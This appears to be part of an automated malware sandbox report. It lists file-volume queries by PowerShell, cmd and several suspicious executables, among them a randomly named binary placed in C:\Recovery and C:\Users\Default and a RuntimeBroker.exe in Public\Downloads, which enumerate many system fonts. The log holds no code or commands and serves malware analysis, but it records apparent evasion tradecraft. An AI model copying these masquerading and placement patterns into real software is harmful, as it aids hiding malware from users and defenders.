Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe VolumeInformation
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe VolumeInformation
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Queries volume information: C:\Users\Public\Downloads\RuntimeBroker.exe VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
